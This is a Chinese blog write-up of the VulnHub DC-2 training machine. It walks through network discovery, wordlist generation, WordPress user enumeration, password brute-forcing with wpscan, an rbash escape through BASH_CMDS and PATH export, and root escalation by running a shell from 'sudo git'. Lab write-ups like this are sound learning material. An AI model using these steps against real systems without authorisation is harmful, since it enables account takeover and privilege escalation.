Vulnhub DC-2靶场

已于 2023-06-11 00:08:40 修改
阅读量258 收藏
点赞数
分类专栏: vulnhub 靶场攻略 文章标签: 安全
于 2022-11-12 15:15:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47019868/article/details/127775670
版权

目录

搭建靶场

发现目标

信息收集

漏洞利用

Flag1

Flag2

Flag3

Flag4

Flag5

搭建靶场

靶场下载地址

DC: 2 ~ VulnHub

下载解压文件,并使用虚拟机软件 创建目标

发现目标

netdiscover -r 192.168.226.0/24

发现目标对象 为 :192.168.226.140

信息收集

nmap -sS -sV -A -T4 -p- 192.168.226.139

使用nmap查看目标 开启了那些端口与服务

 指纹信息收集 报错

 使用BurpSuite分析

发现强跳dc-2

 将dc-2 写入hosts

 直接访问dc-2

 网站cms收集

 网站目录扫描

漏洞利用

Flag1

网站首页 有flag 直接访问

Flag2

根据flag1提示使用cewl 生成 密码字典

cewl http://dc-2/ -w password.txt

 有了密码字典 那应该有登录框 此时想到在目录扫描过程中的后台登录

 有了密码字典 还需要用户字典,网站采用wordpress 可以通过wpscan进行用户探测

wpscan --url http://dc-2 --enumerate u

对站点进行穷举

wpscan --url http://dc-2/ -U user.txt -P password.txt

成功获取账号与密码

 登入后台找到flag

Flag3

根据提示 可以通过其他途径获取进入的通道 此时想起ssh登入端口为7744

 使用cat命令 受限

改用vi命令编辑 

Flag4

根据提示需要找到jerry目录

 绕过rbash限制

export -p
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

找到flag

Flag5

根据提示使用git提权

sudo git -p help config
!/bin/sh

在root目录下找到flag

RLXn0cC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 925
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1558
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
Vulnhub靶场----9、DC-9
七天
03-03 744
Vulnhub-DC9
Vulnhub DC-3靶场
weixin_47019868的博客
11-14 999
Vulnhub DC-3靶场
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 631
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 234
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 504
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发现与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修复已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
数据传输安全--IPSEC
banliyaoguai的博客
07-23 955
默认使用IP地址作为身份标识(因为身份验证是在第五六个数据包中,但是我们在前面的几个数据包过程都需要提取预共享密钥计算,要是等身份标识的话等不下去了,所以只能看IP地址了,然后在第五六个数据包的时候再进行身份认证确认,所以这个东西也很怕NAT),这个身份标识和身份认证是不一样的,在IPSec中多使用预共享密钥进行身份认证,然后这个预共享密钥可能一个人和另外好几个人都有。注意:野蛮模式前两个数据包中的参数用来协商密钥信息,则第三个数据包可以进行加密传输,因为,身份信息是通过明文传递的,所以,安全性较低。
如何开启或者关闭 Windows 安全登录?
qq_57728300的博客
07-22 656
你知道 Windows 安全登录是什么吗?本文教你如何开启或者关闭它。
自媒体创作、小说推文等网赚项目安全吗?网络兼职需要注意什么?
2401_86131344的博客
07-23 456
综上所述,自媒体创作和小说推文等网赚项目在遵守相关规定和采取正确操作方式的前提下是安全的。- 在自媒体创作和小说推文的过程中,要严格遵守平台的相关规定和规则,避免违规行为导致账号被封禁或收益被扣除。自媒体创作和小说推文等网赚项目本身**可以**是安全的,但前提是要采取正确的操作方式和遵守相关规定。- 对于小说推文,要选择正规的小说平台进行合作,例如知乎、起点、飞卢等。
图像识别技术的伦理与法规考量:保障隐私与安全
matlabgoodboy的博客
07-23 565
作为计算机视觉领域的重要应用,其在多个领域如安全监控、医疗诊断、人脸识别等方面展现出巨大的潜力。然而,随着技术的广泛应用,其伦理与法规考量,尤其是隐私与安全问题,日益受到关注。以下从隐私保护、数据安全、技术偏见与歧视、以及法规监管等几个方面进行详细探讨。
SPF配置教程:如何安全构建邮件发送策略?
danplus的博客
07-23 497
SPF配置教程旨在帮助您理解和实施SPF策略,以确保您的邮件通信更加安全和可靠。AokSend,SPF配置教程轻松学,结合API与SMTP,防止邮件伪造,提升邮件送达率!
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值